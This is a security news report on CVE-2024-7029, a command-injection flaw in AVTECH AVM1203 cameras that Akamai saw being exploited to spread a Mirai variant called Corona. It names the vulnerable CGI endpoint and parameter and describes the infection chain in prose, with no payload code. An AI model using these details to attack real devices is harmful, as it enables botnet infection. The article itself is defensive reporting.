CVE-2024-7029: Hackers Target AVTECH Cameras with Mirai Malware
Akamai has detected a new wave of attacks targeting outdated surveillance cameras produced by the Taiwanese manufacturer AVTECH. Cybercriminals are exploiting a critical vulnerability in the AVM1203 model to disseminate malware from the Mirai botnet.
The vulnerability, identified as CVE-2024-7029, allows remote execution of arbitrary code on the device. Although this issue has been known for nearly five years, it was officially recognized and registered only this month. Akamai experts have observed active exploitation of this flaw by hackers since March of this year. To detect these attacks, researchers deployed a network of honeypots, simulating vulnerable cameras on the internet.
The Mirai botnet first made headlines in 2016 when it was used to launch a massive DDoS attack on the website of cybersecurity expert Brian Krebs. In the following weeks, it was deployed against internet service providers and other targets. One such attack on the DNS provider Dyn led to widespread disruptions across many popular web services.
The situation was further complicated when Mirai’s creators released the source code of the malware, enabling virtually anyone to create their variants for conducting DDoS attacks of unprecedented scale. According to Kyle Lefton, a researcher from Akamai’s Threat Response Team, they have observed DDoS attacks using infected cameras against “various organizations.” However, there is no evidence yet that the attackers are using the cameras for espionage or video stream viewing.
The exploited vulnerability is related to the improper handling of the brightness parameter in a request to the file /cgi-bin/supervisor/Factory.cgi, which allows the injection of malicious commands. During the attack, a JavaScript file is downloaded onto the device, which then fetches and executes the main payload—a variant of Mirai known as Corona. Once the device is infected, the malware attempts to propagate further by connecting via Telnet to other hosts. Additionally, it exploits several other vulnerabilities, including RCE in Hadoop YARN, CVE-2014-8361, and CVE-2017-17215.
Since the vulnerable AVM1203 camera model is no longer supported by the manufacturer, experts strongly advise users to discontinue its use entirely and replace it with more modern devices. Furthermore, specialists once again emphasize the importance of changing default credentials on all internet-connected devices.
